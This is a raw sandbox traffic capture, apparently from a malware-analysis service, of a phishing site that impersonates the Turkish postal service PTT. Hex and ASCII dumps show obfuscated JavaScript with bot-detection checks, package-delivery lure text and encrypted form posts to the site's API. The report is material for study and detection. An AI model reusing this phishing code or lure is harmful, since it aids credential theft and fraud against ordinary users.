    Data Ascii: '_selenium','versions','onsistent','code','windowExte','hasOwnProp','next','getItem','NightmareJ','ets','return','ementKeys','rAlert','ringContex','flect]','http','Sequentum','create','_unwrapped','66440gfTUFd','bot','ApplePayEr','webDriver','distinctiv',


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    24192.168.2.449767104.21.47.250443928C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-09-01 22:28:24 UTC532OUTGET /help/assets/cbcdcea5JxKnW.js HTTP/1.1
    Host: pttgovnv.top
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    Origin: https://pttgovnv.top
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: */*
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: script
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-09-01 22:28:24 UTC762INHTTP/1.1 200 OK
    Date: Sun, 01 Sep 2024 22:28:24 GMT
    Content-Type: application/javascript; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    Access-Control-Allow-Origin: *
    Cache-Control: public, max-age=86400
    Last-Modified: Wed, 29 May 2024 10:14:44 GMT
    ETag: W/"17d2-18fc3d84e20"
    CF-Cache-Status: HIT
    Age: 37245
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2ATIKp9s%2BAbbBZtBYJuF8MlxiCPrnSyZLjcZ9kTmmg97r8nNaMpW5Tx9QXLzO%2BkYK4%2Bsbe4chUQzQLywywN3WjKJ%2FnMECErGE6XjQSfXytxC3nk6Z7Bg9TeX0bY%2Fd4g%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8bc8b1776ee6440e-EWR
    alt-svc: h3=":443"; ma=86400
    2024-09-01 22:28:24 UTC607INData Raw: 31 37 64 32 0d 0a 63 6f 6e 73 74 20 61 32 36 5f 30 78 32 66 36 62 32 65 3d 61 32 36 5f 30 78 32 31 39 35 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 62 32 36 64 35 2c 5f 30 78 35 38 66 37 30 33 29 7b 63 6f 6e 73 74 20 5f 30 78 35 35 62 61 30 32 3d 61 32 36 5f 30 78 32 31 39 35 2c 5f 30 78 35 36 65 64 31 35 3d 5f 30 78 34 62 32 36 64 35 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 31 63 32 66 33 33 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 35 62 61 30 32 28 30 78 31 36 33 29 29 2f 30 78 31 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 35 62 61 30 32 28 30 78 31 39 61 29 29 2f 30 78 32 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 35 35 62 61 30 32 28 30 78 31 36 30 29 29 2f 30 78 33 29 2b 70 61 72 73 65 49 6e 74 28 5f
    Data Ascii: 17d2const a26_0x2f6b2e=a26_0x2195;(function(_0x4b26d5,_0x58f703){const _0x55ba02=a26_0x2195,_0x56ed15=_0x4b26d5();while(!![]){try{const _0x1c2f33=-parseInt(_0x55ba02(0x163))/0x1+-parseInt(_0x55ba02(0x19a))/0x2*(parseInt(_0x55ba02(0x160))/0x3)+parseInt(_
    2024-09-01 22:28:24 UTC1369INData Raw: 35 32 33 39 37 39 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 5f 30 78 31 61 63 66 39 39 3d 21 21 5b 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 64 33 32 31 39 2c 5f 30 78 32 30 32 37 63 33 29 7b 63 6f 6e 73 74 20 5f 30 78 32 34 61 35 30 35 3d 5f 30 78 31 61 63 66 39 39 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 5f 30 78 32 34 38 63 66 38 3d 61 32 36 5f 30 78 32 31 39 35 3b 69 66 28 5f 30 78 32 30 32 37 63 33 29 7b 63 6f 6e 73 74 20 5f 30 78 36 32 36 65 34 32 3d 5f 30 78 32 30 32 37 63 33 5b 5f 30 78 32 34 38 63 66 38 28 30 78 31 38 65 29 5d 28 5f 30 78 32 64 33 32 31 39 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 5f 30 78 32 30 32 37 63 33 3d 6e 75 6c 6c 2c 5f 30 78 36 32 36 65 34 32 3b 7d 7d 3a 66 75
    Data Ascii: 523979=(function(){let _0x1acf99=!![];return function(_0x2d3219,_0x2027c3){const _0x24a505=_0x1acf99?function(){const _0x248cf8=a26_0x2195;if(_0x2027c3){const _0x626e42=_0x2027c3[_0x248cf8(0x18e)](_0x2d3219,arguments);return _0x2027c3=null,_0x626e42;}}:fu
    2024-09-01 22:28:24 UTC1369INData Raw: 6e 74 69 6e 75 65 27 2c 27 74 6f 53 74 72 69 6e 67 27 2c 27 6e 6f 74 69 63 65 4c 69 73 74 27 2c 27 37 32 34 37 36 53 58 42 43 6f 4a 27 2c 27 74 72 61 63 6b 54 69 74 6c 65 27 2c 27 5c 78 32 30 2a 64 61 74 65 2a 5c 78 32 30 5c 78 32 37 64 27 2c 27 59 6f 75 72 5c 78 32 30 70 61 63 6b 61 27 2c 27 6e 65 78 74 27 2c 27 61 74 65 5c 78 32 30 79 6f 75 72 5c 78 32 30 61 27 2c 27 44 65 6c 69 76 65 72 79 5c 78 32 30 46 27 2c 27 73 65 61 72 63 68 27 2c 27 50 61 6b 65 74 5c 78 32 30 4e 75 6d 61 27 2c 27 39 30 36 33 37 34 37 67 64 56 4a 59 42 27 2c 27 31 37 33 38 32 39 36 6b 66 66 66 4e 72 27 2c 27 75 6d 75 27 2c 27 5c 78 32 30 61 67 61 69 6e 5c 78 32 30 6f 6e 5c 78 32 30 27 2c 27 70 72 65 76 65 6e 74 27 2c 27 4c c3 bc 74 66 65 6e 5c 78 32 30 61 64 72 27 2c 27 72 65 64
    Data Ascii: ntinue','toString','noticeList','72476SXBCoJ','trackTitle','\x20*date*\x20\x27d','Your\x20packa','next','ate\x20your\x20a','Delivery\x20F','search','Paket\x20Numa','9063747gdVJYB','1738296kfffNr','umu','\x20again\x20on\x20','prevent','Ltfen\x20adr','red
    2024-09-01 22:28:24 UTC1369INData Raw: 78 31 36 38 29 2b 27 69 6e 67 5c 78 32 30 6e 75 6d 62 65 72 27 2b 61 32 36 5f 30 78 32 66 36 62 32 65 28 30 78 31 61 63 29 7d 2c 27 6e 6f 74 69 63 65 27 3a 7b 27 64 65 66 61 75 6c 74 27 3a 61 32 36 5f 30 78 32 66 36 62 32 65 28 30 78 31 38 32 29 2b 61 32 36 5f 30 78 32 66 36 62 32 65 28 30 78 31 36 35 29 2b 61 32 36 5f 30 78 32 66 36 62 32 65 28 30 78 31 37 35 29 7d 2c 27 6e 6f 74 69 63 65 4c 69 73 74 27 3a 7b 27 64 65 66 61 75 6c 74 27 28 29 7b 63 6f 6e 73 74 20 5f 30 78 35 37 63 32 32 65 3d 61 32 36 5f 30 78 32 66 36 62 32 65 3b 72 65 74 75 72 6e 5b 27 59 6f 75 72 5c 78 32 30 70 61 63 6b 61 27 2b 5f 30 78 35 37 63 32 32 65 28 30 78 31 61 34 29 2b 5f 30 78 35 37 63 32 32 65 28 30 78 31 39 34 29 2b 5f 30 78 35 37 63 32 32 65 28 30 78 31 39 62 29 2b 5f 30
    Data Ascii: x168)+'ing\x20number'+a26_0x2f6b2e(0x1ac)},'notice':{'default':a26_0x2f6b2e(0x182)+a26_0x2f6b2e(0x165)+a26_0x2f6b2e(0x175)},'noticeList':{'default'(){const _0x57c22e=a26_0x2f6b2e;return['Your\x20packa'+_0x57c22e(0x1a4)+_0x57c22e(0x194)+_0x57c22e(0x19b)+_0
    2024-09-01 22:28:24 UTC1369INData Raw: 39 29 5d 29 7d 2c 5b 65 28 27 68 31 27 2c 44 2c 61 32 36 5f 30 78 31 64 34 63 66 30 28 5f 30 78 34 32 33 35 34 39 5b 5f 30 78 34 39 31 31 38 66 28 30 78 31 61 37 29 5d 29 2c 30 78 31 29 2c 49 2c 65 28 5f 30 78 34 39 31 31 38 66 28 30 78 31 61 32 29 2c 7a 2c 5b 65 28 27 70 27 2c 6e 75 6c 6c 2c 61 32 36 5f 30 78 31 64 34 63 66 30 28 5f 30 78 34 32 33 35 34 39 5b 5f 30 78 34 39 31 31 38 66 28 30 78 31 37 64 29 5d 5b 5f 30 78 34 39 31 31 38 66 28 30 78 31 39 35 29 5d 28 5f 30 78 34 39 31 31 38 66 28 30 78 31 36 61 29 2c 75 28 5f 30 78 31 39 65 39 30 61 29 29 29 2c 30 78 31 29 2c 65 28 27 70 27 2c 77 2c 5b 65 28 27 62 27 2c 6e 75 6c 6c 2c 61 32 36 5f 30 78 31 64 34 63 66 30 28 5f 30 78 34 32 33 35 34 39 5b 5f 30 78 34 39 31 31 38 66 28 30 78 31 37 34 29 5d 29
    Data Ascii: 9)])},[e('h1',D,a26_0x1d4cf0(_0x423549[_0x49118f(0x1a7)]),0x1),I,e(_0x49118f(0x1a2),z,[e('p',null,a26_0x1d4cf0(_0x423549[_0x49118f(0x17d)][_0x49118f(0x195)](_0x49118f(0x16a),u(_0x19e90a))),0x1),e('p',w,[e('b',null,a26_0x1d4cf0(_0x423549[_0x49118f(0x174)])
    2024-09-01 22:28:24 UTC23INData Raw: 65 78 70 6f 72 74 7b 47 20 61 73 20 64 65 66 61 75 6c 74 7d 3b 0d 0a
    Data Ascii: export{G as default};
    2024-09-01 22:28:24 UTC5INData Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    25192.168.2.449762104.21.47.250443928C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-09-01 22:28:24 UTC618OUTPOST /api/MC45NTAzNDk0MzkyMzA0MDQ4 HTTP/1.1
    Host: pttgovnv.top
    Connection: keep-alive
    Content-Length: 292
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-platform: "Windows"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Content-Type: text/encrypt
    Accept: */*
    Origin: https://pttgovnv.top
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://pttgovnv.top/help/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-09-01 22:28:24 UTC292OUTData Raw: 55 32 46 73 64 47 56 6b 58 31 38 38 55 55 77 7a 55 44 69 5a 55 72 33 7a 75 2f 4e 58 57 31 6d 4f 33 58 6a 46 73 46 69 37 77 41 6b 42 2b 56 66 6d 62 41 56 57 68 42 66 59 63 34 6a 4f 70 51 6b 63 6c 36 62 72 37 42 6e 76 68 68 66 4c 30 37 5a 6c 46 72 4f 69 41 75 35 6a 32 6b 54 37 72 31 79 76 2b 4b 75 77 42 50 6b 6f 4e 2f 6e 2f 79 37 50 4a 57 6a 72 4c 66 69 59 48 55 45 72 6e 6d 6f 5a 54 38 7a 69 57 71 46 6d 4c 36 56 5a 57 75 6a 61 31 6a 68 43 58 76 51 4c 38 37 44 50 47 2f 76 70 30 57 73 56 33 69 79 58 38 58 4e 71 57 32 43 56 57 73 44 7a 70 4b 67 68 73 56 58 75 49 58 54 57 54 2f 6b 57 32 35 52 52 32 31 35 61 77 68 39 44 76 78 4d 6f 48 32 56 35 2f 4d 68 56 73 74 7a 7a 47 6b 78 66 72 4c 72 2b 7a 4e 4c 45 37 4b 6c 6e 37 42 54 67 6c 61 37 69 67 54 6b 61 56 38 67 59
    Data Ascii: U2FsdGVkX188UUwzUDiZUr3zu/NXW1mO3XjFsFi7wAkB+VfmbAVWhBfYc4jOpQkcl6br7BnvhhfL07ZlFrOiAu5j2kT7r1yv+KuwBPkoN/n/y7PJWjrLfiYHUErnmoZT8ziWqFmL6VZWuja1jhCXvQL87DPG/vp0WsV3iyX8XNqW2CVWsDzpKghsVXuIXTWT/kW25RR215awh9DvxMoH2V5/MhVstzzGkxfrLr+zNLE7Kln7BTgla7igTkaV8gY
    2024-09-01 22:28:25 UTC687INHTTP/1.1 200 OK
    Date: Sun, 01 Sep 2024 22:28:25 GMT
    Content-Type: application/json; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    Access-Control-Allow-Origin: *
    ETag: W/"600-FgV/QViYKGdZ0gy6hxEqEd4J7IM"
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DOyI5vGH%2BvZamvVzcox%2B7aXOMgYBS9qFGkbVrozNd0rtkHftRQhd5SE70BIxrkTRKyOa7X7gAk6qf%2F6W%2FynOWNv1vg%2FQI8uKdY%2BRERBWO%2FSl9ZeD3o2I%2FM578LS9%2BRc%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8bc8b1776eed72ad-EWR
    alt-svc: h3=":443"; ma=86400
    2024-09-01 22:28:25 UTC682INData Raw: 36 30 30 0d 0a 55 32 46 73 64 47 56 6b 58 31 2b 33 46 39 44 68 4c 6e 68 61 6d 4d 49 42 78 4b 44 6e 59 67 76 45 5a 74 61 6d 67 78 35 46 43 73 30 74 2f 6e 79 68 55 4a 33 73 4f 30 6f 42 33 34 72 70 73 56 70 30 77 2f 50 2b 78 68 4a 6f 63 2b 4a 48 6e 72 4c 39 43 33 36 37 76 5a 50 75 72 63 48 2b 69 37 43 50 78 55 4f 41 59 39 50 69 36 50 4d 61 6f 66 39 62 54 41 32 2f 6a 67 56 42 30 33 41 6b 79 61 35 79 44 4d 61 53 76 58 67 32 58 31 50 45 48 41 47 43 53 49 77 70 68 67 78 4f 33 6f 4c 73 68 4d 48 58 41 78 53 49 49 73 66 76 36 75 52 54 34 6a 56 59 77 58 73 66 6e 54 49 34 38 37 73 48 47 52 66 30 69 31 4b 51 38 79 73 54 58 4e 75 2b 37 73 68 44 66 50 6a 51 5a 6c 71 64 30 64 53 52 42 69 53 72 70 30 6a 2b 41 37 42 68 6e 44 71 48 31 33 71 52 33 63 4e 66 53 42 50 50 30 68
    Data Ascii: 600U2FsdGVkX1+3F9DhLnhamMIBxKDnYgvEZtamgx5FCs0t/nyhUJ3sO0oB34rpsVp0w/P+xhJoc+JHnrL9C367vZPurcH+i7CPxUOAY9Pi6PMaof9bTA2/jgVB03Akya5yDMaSvXg2X1PEHAGCSIwphgxO3oLshMHXAxSIIsfv6uRT4jVYwXsfnTI487sHGRf0i1KQ8ysTXNu+7shDfPjQZlqd0dSRBiSrp0j+A7BhnDqH13qR3cNfSBPP0h
    2024-09-01 22:28:25 UTC861INData Raw: 52 50 48 72 37 43 55 39 75 69 6c 63 43 35 50 71 73 4c 5a 47 6b 54 31 69 31 49 62 6f 51 52 79 69 65 44 33 2b 66 38 6d 6e 41 51 46 71 65 37 6f 4a 6b 75 71 56 39 58 6b 33 4d 32 38 73 67 33 72 52 44 7a 31 49 79 48 79 50 35 61 47 56 37 58 31 4d 56 47 76 30 4a 37 53 6b 33 58 71 37 59 70 50 53 75 34 46 35 4d 42 66 2b 46 4e 62 54 79 67 58 42 4d 54 7a 75 72 6d 46 59 65 47 63 75 50 67 44 53 36 41 53 46 72 43 67 54 62 77 6c 6c 36 66 67 4d 66 44 32 42 4d 58 31 56 6a 73 4f 58 50 6d 6b 6d 4f 6b 4a 79 61 6f 47 69 6f 2b 67 53 49 65 63 4a 67 65 2f 42 71 41 6b 6c 2f 4d 35 65 33 2b 48 64 68 77 36 30 78 49 36 48 56 6b 5a 30 78 70 77 70 63 5a 42 62 37 36 5a 7a 38 4b 64 4e 68 45 37 47 51 63 49 55 69 66 79 54 4a 34 55 77 46 4f 2f 31 43 61 4e 48 5a 57 44 2b 71 6c 51 62 79 53 39
    Data Ascii: RPHr7CU9uilcC5PqsLZGkT1i1IboQRyieD3+f8mnAQFqe7oJkuqV9Xk3M28sg3rRDz1IyHyP5aGV7X1MVGv0J7Sk3Xq7YpPSu4F5MBf+FNbTygXBMTzurmFYeGcuPgDS6ASFrCgTbwll6fgMfD2BMX1VjsOXPmkmOkJyaoGio+gSIecJge/BqAkl/M5e3+Hdhw60xI6HVkZ0xpwpcZBb76Zz8KdNhE7GQcIUifyTJ4UwFO/1CaNHZWD+qlQbyS9
    2024-09-01 22:28:25 UTC5INData Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    26192.168.2.449770104.21.47.250443928C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-09-01 22:28:25 UTC364OUTGET /help/assets/f3c7e6fbJxKnW.js HTTP/1.1
    Host: pttgovnv.top
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-09-01 22:28:25 UTC759INHTTP/1.1 200 OK
    Date: Sun, 01 Sep 2024 22:28:25 GMT
    Content-Type: application/javascript; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    Access-Control-Allow-Origin: *
    Cache-Control: public, max-age=86400
    Last-Modified: Wed, 29 May 2024 10:14:44 GMT
    ETag: W/"2755a-18fc3d84e20"
    CF-Cache-Status: HIT
    Age: 185
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1CYClJvwtJ%2B68d3CS2sq%2FV%2BwbdiYI09795d3vNQcGeYG9uXFDAkLE4wDbuKqBd1b5ySDxc9fPyN3fUdQH%2B6PfjekPzfaTdBg80ub4sDbwsEy6zh3Mr3hVMHRMBkIzp8%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8bc8b17afa49c34a-EWR
    alt-svc: h3=":443"; ma=86400
    2024-09-01 22:28:25 UTC610INData Raw: 37 63 62 38 0d 0a 63 6f 6e 73 74 20 61 33 33 5f 30 78 37 36 32 63 37 31 3d 61 33 33 5f 30 78 64 61 36 65 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 64 32 30 33 39 2c 5f 30 78 33 34 61 33 38 65 29 7b 63 6f 6e 73 74 20 5f 30 78 33 30 33 62 61 65 3d 61 33 33 5f 30 78 64 61 36 65 2c 5f 30 78 32 32 66 32 35 61 3d 5f 30 78 31 64 32 30 33 39 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 63 31 65 34 62 30 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 30 33 62 61 65 28 30 78 31 66 34 29 29 2f 30 78 31 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 30 33 62 61 65 28 30 78 34 38 61 29 29 2f 30 78 32 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 30 33 62 61 65 28 30 78 38 34 33 29 29 2f 30 78 33 29 2b 2d 70 61 72 73 65 49 6e 74
    Data Ascii: 7cb8const a33_0x762c71=a33_0xda6e;(function(_0x1d2039,_0x34a38e){const _0x303bae=a33_0xda6e,_0x22f25a=_0x1d2039();while(!![]){try{const _0xc1e4b0=-parseInt(_0x303bae(0x1f4))/0x1+-parseInt(_0x303bae(0x48a))/0x2*(-parseInt(_0x303bae(0x843))/0x3)+-parseInt
    2024-09-01 22:28:25 UTC1369INData Raw: 5f 30 78 33 38 62 31 2c 30 78 35 63 62 38 63 29 29 3b 66 75 6e 63 74 69 6f 6e 20 61 33 33 5f 30 78 33 38 62 31 28 29 7b 63 6f 6e 73 74 20 5f 30 78 35 37 36 66 37 35 3d 5b 27 65 6d 5f 70 74 74 5f 61 62 6f 27 2c 27 63 7a 30 6e 64 48 4a 68 62 6e 27 2c 27 3e 54 65 62 6c 69 67 61 74 5c 78 32 30 27 2c 27 4f 4e 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 5f 5f 27 2c 27 2d 33 32 27 2c 27 2f 61 3e 3c 2f 73 70 61 6e 3e 27 2c 27 6b 74 61 5f 68 69 7a 6d 65 74 27 2c 27 59 54 34 38 4c 32 52 70 64 6a 27 2c 27 63 6c 61 73 73 3d 5c 78 32 32 69 74 65 27 2c 27 62 61 6e 6b 2e 70 74 74 2e 67 27 2c 27 6c 5c 78 32 30 75 69 2d 77 69 64 67 65 27 2c 27 74 41 6b 25 43 34 25 42 31 6c 27 2c 27 4a 76 5a 48 56 6a 64 47 6c 74 27 2c 27 61 67 65 5c 78 32 30 68 61 73 2d 73 75 27 2c 27 23
    Data Ascii: _0x38b1,0x5cb8c));function a33_0x38b1(){const _0x576f75=['em_ptt_abo','cz0ndHJhbn','>Tebligat\x20','ON\x22\x20id=\x22__','-32','/a></span>','kta_hizmet','YT48L2Rpdj','class=\x22ite','bank.ptt.g','l\x20ui-widge','tAk%C4%B1l','JvZHVjdGlt','age\x20has-su','#
    2024-09-01 22:28:25 UTC1369INData Raw: 72 69 5f 27 2c 27 42 6d 59 58 6c 6b 59 57 7a 45 27 2c 27 6a 61 78 4c 69 6e 6b 5c 78 32 32 5c 78 32 30 68 27 2c 27 68 69 64 64 65 6e 27 2c 27 6e 65 77 73 70 61 70 65 72 5c 78 32 32 27 2c 27 65 62 70 61 72 74 5c 78 32 32 3e 3c 64 27 2c 27 69 6e 5f 61 63 69 6b 6c 61 6d 27 2c 27 4e 54 55 76 64 32 56 69 49 48 27 2c 27 5f 64 69 67 65 72 5f 70 6f 73 27 2c 27 61 73 70 78 27 2c 27 6f 6e 74 61 69 6e 65 72 5c 78 32 30 6e 27 2c 27 69 5f 62 61 6e 6b 61 73 69 5f 27 2c 27 3c 2f 61 3e 3c 2f 64 69 76 3e 27 2c 27 6a 61 78 4c 69 6e 6b 5c 78 32 32 5c 78 32 30 63 27 2c 27 46 6d 79 6a 41 34 37 4b 38 77 27 2c 27 74 72 61 6e 73 5c 78 32 30 68 61 73 2d 27 2c 27 69 74 69 6f 6e 5c 78 32 32 5c 78 32 30 68 72 65 27 2c 27 73 78 2d 6d 65 6e 75 27 2c 27 69 5c 78 32 30 3c 2f 61 3e 3c 61
    Data Ascii: ri_','BmYXlkYWzE','jaxLink\x22\x20h','hidden','newspaper\x22','ebpart\x22><d','in_aciklam','NTUvd2ViIH','_diger_pos','aspx','ontainer\x20n','i_bankasi_','</a></div>','jaxLink\x22\x20c','FmyjA47K8w','trans\x20has-','ition\x22\x20hre','sx-menu','i\x20</a><a
    2024-09-01 22:28:25 UTC1369INData Raw: 27 2c 27 77 74 65 48 4d 74 4e 43 63 2b 27 2c 27 70 6e 67 27 2c 27 59 58 4e 7a 50 53 64 77 64 48 27 2c 27 65 6d 5f 70 74 74 5f 68 67 73 27 2c 27 65 72 69 5f 70 6f 73 74 61 5f 27 2c 27 5c 78 32 32 3e 3c 61 5c 78 32 30 68 72 65 66 3d 27 2c 27 73 78 2d 63 65 6c 6c 27 2c 27 5c 78 32 30 69 64 3d 5c 78 32 32 41 6a 61 78 4c 27 2c 27 63 37 31 2d 34 63 32 64 2d 38 27 2c 27 6b 25 32 30 4b 25 43 34 25 42 27 2c 27 6e 6f 6f 70 65 6e 65 72 5c 78 32 30 6e 27 2c 27 61 6c 2e 61 73 70 78 23 70 74 27 2c 27 6f 74 64 6c 67 5c 78 32 30 6e 6f 69 6e 27 2c 27 2d 31 39 27 2c 27 2f 69 70 63 73 65 72 76 6c 65 27 2c 27 74 65 6d 5c 78 32 30 63 6f 6c 2d 6d 64 27 2c 27 74 5f 69 6c 5f 76 65 5f 69 6c 27 2c 27 63 6c 61 73 73 3d 5c 78 32 32 72 6f 77 27 2c 27 2f 2f 77 77 77 2e 66 69 6c 61 27
    Data Ascii: ','wteHMtNCc+','png','YXNzPSdwdH','em_ptt_hgs','eri_posta_','\x22><a\x20href=','sx-cell','\x20id=\x22AjaxL','c71-4c2d-8','k%20K%C4%B','noopener\x20n','al.aspx#pt','otdlg\x20noin','-19','/ipcservle','tem\x20col-md','t_il_ve_il','class=\x22row','//www.fila'
    2024-09-01 22:28:25 UTC1369INData Raw: 5c 78 32 32 5c 78 32 30 27 2c 27 6e 6c 69 6e 65 5f 64 61 74 61 27 2c 27 65 6d 65 49 73 6c 65 6d 6c 65 27 2c 27 61 67 65 27 2c 27 65 6d 5f 70 6f 73 74 61 27 2c 27 4e 74 4c 54 4d 67 59 32 39 73 27 2c 27 64 48 52 68 64 6d 30 75 59 32 27 2c 27 65 6d 5f 70 74 74 5f 74 65 62 27 2c 27 5a 68 62 47 46 79 4c 30 4a 68 27 2c 27 56 34 4c 31 52 31 63 6e 42 6c 27 2c 27 23 70 74 74 5f 74 65 6c 67 72 27 2c 27 6f 72 75 6d 6c 75 6c 75 6b 5f 27 2c 27 68 62 5f 6f 64 65 6d 65 6c 65 27 2c 27 5f 76 65 5f 6f 64 65 6d 65 5f 27 2c 27 72 65 64 69 5c 78 32 30 c3 96 64 65 6d 65 27 2c 27 74 74 6f 6e 5c 78 32 32 3e 44 61 68 61 27 2c 27 3d 5c 78 32 32 74 72 61 6e 73 69 74 69 27 2c 27 38 38 3c 2f 61 3e 3c 2f 73 70 27 2c 27 63 6c 61 73 73 3d 5c 78 32 32 73 6f 63 27 2c 27 5c 78 32 32 5c 78
    Data Ascii: \x22\x20','nline_data','emeIslemle','age','em_posta','NtLTMgY29s','dHRhdm0uY2','em_ptt_teb','ZhbGFyL0Jh','V4L1R1cnBl','#ptt_telgr','orumluluk_','hb_odemele','_ve_odeme_','redi\x20deme','tton\x22>Daha','=\x22transiti','88</a></sp','class=\x22soc','\x22\x
    2024-09-01 22:28:25 UTC1369INData Raw: 27 2c 27 59 69 42 7a 61 58 52 6c 63 32 27 2c 27 42 6a 62 32 77 74 63 32 30 74 27 2c 27 4d 36 4c 79 39 33 64 33 63 75 27 2c 27 72 2f 4b 61 72 67 6f 2f 41 6d 27 2c 27 4a 6b 58 7a 67 78 59 54 42 66 27 2c 27 74 74 5f 74 65 62 6c 69 67 61 27 2c 27 62 6c 69 67 61 74 2e 61 73 70 27 2c 27 69 2e 61 73 70 78 5c 78 32 32 3e 50 74 27 2c 27 5c 78 32 30 4b 41 54 41 4c 4f c4 9e 55 5c 78 32 30 27 2c 27 41 50 47 5c 78 32 30 27 2c 27 54 4f 52 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 5f 27 2c 27 64 48 52 66 5a 6d 46 35 5a 47 27 2c 27 66 5f 68 69 7a 6d 65 74 6c 65 27 2c 27 54 75 72 70 65 78 5c 78 32 30 27 2c 27 52 30 58 32 5a 68 65 57 52 68 27 2c 27 64 69 5f 6b 61 72 74 69 5f 6f 27 2c 27 64 69 76 3e 3c 64 69 76 5c 78 32 30 69 27 2c 27 32 36 35 63 53 63 55 77 6e 27 2c 27
    Data Ascii: ','YiBzaXRlc2','Bjb2wtc20t','M6Ly93d3cu','r/Kargo/Am','JkXzgxYTBf','tt_tebliga','bligat.asp','i.aspx\x22>Pt','\x20KATALOU\x20','APG\x20','TOR\x22\x20id=\x22_','dHRfZmF5ZG','f_hizmetle','Turpex\x20','R0X2ZheWRh','di_karti_o','div><div\x20i','265cScUwn','
    2024-09-01 22:28:25 UTC1369INData Raw: 72 75 6c 61 72 27 2c 27 6e 61 76 62 61 72 2d 74 6f 67 27 2c 27 53 61 79 66 61 6c 61 72 2f 4b 27 2c 27 23 70 74 74 5f 62 69 6c 67 69 27 2c 27 2d 31 38 27 2c 27 55 59 31 79 4c 36 5c 78 32 32 3e 3c 2f 27 2c 27 61 79 c4 b1 74 6c c4 b1 5c 78 32 30 45 6c 65 27 2c 27 59 57 4e 6f 62 57 56 75 64 48 27 2c 27 61 74 65 6c 69 5f 73 6f 7a 6c 27 2c 27 53 47 4b 5c 78 32 30 4d 61 61 c5 9f 5c 78 32 30 c3 96 27 2c 27 6d 74 6f 79 2e 70 74 74 2e 67 27 2c 27 65 72 5c 78 32 32 5c 78 32 30 68 72 65 66 3d 5c 78 32 32 27 2c 27 61 66 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 27 2c 27 2e 74 72 2f 53 61 79 66 61 6c 27 2c 27 45 43 33 34 41 38 35 41 42 41 27 2c 27 61 73 70 78 5c 78 32 32 3e c3 96 64 65 6d 27 2c 27 70 6c 61 79 3a 6e 6f 6e 65 3b 27 2c 27 61 73 73 3d 5c 78 32 32 74 72 61
    Data Ascii: rular','navbar-tog','Sayfalar/K','#ptt_bilgi','-18','UY1yL6\x22></','aytl\x20Ele','YWNobWVudH','ateli_sozl','SGK\x20Maa\x20','mtoy.ptt.g','er\x22\x20href=\x22','af\x22\x20class=','.tr/Sayfal','EC34A85ABA','aspx\x22>dem','play:none;','ass=\x22tra
